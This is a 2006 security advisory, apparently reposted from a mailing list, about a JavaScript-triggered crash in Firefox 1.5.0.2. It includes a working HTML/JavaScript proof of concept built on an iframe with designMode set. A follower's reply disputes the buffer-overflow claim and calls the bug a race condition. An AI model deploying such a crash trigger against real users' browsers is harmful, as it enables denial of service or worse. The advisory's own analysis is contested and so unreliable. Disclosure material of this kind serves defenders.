Improper handling of JavaScript content allows attackers to execute arbitrary code and crash Mozilla Firefox.
Credit:
The information has been provided by Chris.
The original article can be found at: http://www.securident.com/vuln/ff.txt
Vulnerable Systems:
* Firefox 1.5.0.2
Using the JavaScript below causes a buffer overflow in Firefox when it attempts to use the new iframe that was written.
A focus on the iframe will cause Firefox to crash.
Proof of Concept:
<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>
Subject: remote code execution wtf
Date: 2 May 2006
From: zarz
do people even analyze any of these bugs?
i fail to see how this is a buffer overflow of any kind. it looks more like a race condition to me, and
it triggers like a race condition as well. and the focus on the iframe doesn't cause the crash, that
initially triggers the bug. the doc.close() triggers the crash. some people need to figure out how
to learn to use their debugger.
-zargh